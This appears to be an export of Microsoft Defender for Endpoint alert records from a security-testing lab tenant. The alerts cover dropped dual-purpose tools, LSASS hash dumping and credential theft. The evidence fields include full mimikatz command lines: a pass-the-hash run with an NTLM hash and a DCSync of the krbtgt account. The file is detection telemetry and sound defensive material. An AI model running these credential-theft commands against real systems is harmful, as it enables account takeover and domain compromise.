"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-09-30T06:11:59.3259132Z",
"processId": 7288,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152859417421_-978604212
|
7ffb7dac-2882-4f2c-92ef-bae390bb9649
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:14:45.9417633Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:11:51.5405233Z
|
2022-09-30T06:13:05.8555521Z
|
Multiple dual-purpose tools were dropped
|
Multiple known public tools, which could also be used for malicious reasons were dropped on this device.
Attackers might download or copy multiple dual-purpose tools to the target device to perform various attack stages including, credential theft, privilege escalation, and lateral movement.
|
LateralMovement
|
Resolved
|
High
| 20
|
TerminatedBySystem
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
e0e0ea40-b5ca-4cbf-8380-24119951f847
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1021",
"T1105",
"T1555",
"T1558.003",
"T1570"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:46.0833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.0833333Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved",
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.0833333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved",
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.0833333Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.0833333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "61a4a69fc19221b9abcb65a3be09ed3c041d1c42",
"sha256": "3a4ae2a05b8f4cefcad48134573194239d2c1583d5f4d92d295aca7d4120a402",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.0833333Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "0b777e92992c7a306b8a28c7994078e334000781",
"sha256": "ba304316603a46ebca501de75bf7cf05c32e885e5b1120e0b94827002d0d1ad6",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.0833333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001156016297093_744680965
|
b797799f-a9e5-496a-aac4-7b7f1f81b61c
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:20:01.6297246Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:16:39.7387937Z
|
2022-09-30T06:16:39.7387937Z
|
Password hashes dumped from LSASS memory
|
LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users.
|
CredentialAccess
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
2ed33edd-2c33-49fd-877b-ab73fba14d59
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1003.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Medium",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:20:01.6733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T17:25:57.07Z
|
Suspicious
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037516153792512_-854758450
|
51bb2856-12a8-49cf-bf80-ea8439cb833b
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:20:15.3792711Z
|
2022-11-12T01:35:43.1766667Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:17:36.347066Z
|
2022-11-11T08:17:36.347066Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Critical",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:15.4333333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Url",
"evidenceCreationTime": "2022-11-11T08:20:15.4333333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": "msdxv2-dc.msdxv2.m365dpoc.com",
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-11T08:20:15.4333333Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.10",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:20:15.4333333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-11T08:17:36.2207277Z",
"processId": 2420,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.